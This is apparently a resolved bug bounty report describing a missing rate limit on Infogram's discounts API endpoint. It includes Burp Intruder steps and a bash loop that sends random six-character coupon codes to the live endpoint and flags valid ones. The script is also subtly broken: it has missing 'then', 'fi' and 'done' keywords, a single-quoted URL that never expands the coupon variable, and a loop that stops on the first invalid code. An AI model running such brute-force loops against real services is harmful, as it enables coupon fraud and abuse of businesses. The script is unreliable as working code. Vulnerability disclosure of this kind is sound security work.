Loading HuntDB...

Bruteforcing Coupons

I
Infogram
Submitted None
Reported by t-pwn

Vulnerability Details

Technical details and impact analysis

Hi, while i was fuzzing for an API endpoints i found this endpoint: https://infogram.com/api/discounts the first thing came on my mind is bruteforcing the coupon codes so i gave it a try and it worked! there's no rate limit on that endpoint so an attacker could use it to bruteforce the coupon codes and filter the results to snipe the "valid":true response ##Steps to reproduce: + intercept the request using burpsuite or any proxy tool you would like to use + send the request to the intruder + configure the payload position {F238091} + start the attack i wrote a simple script in bash to do the operation ``` #!/bin/bash while [ 1 ] do coupon=$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 6 | head -n 1) curl=$(curl -i -s -k -X $'GET' \ -H $'X-Requested-With: XMLHttpRequest' \ -b $'Cookies:XXXXXXX' \ $'https://infogram.com/api/discounts/$coupon') if [[ $curl == *"valid":true* ]] echo "$coupon is valid"; else echo "$coupon is invalid"; break; ``` Thanks.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted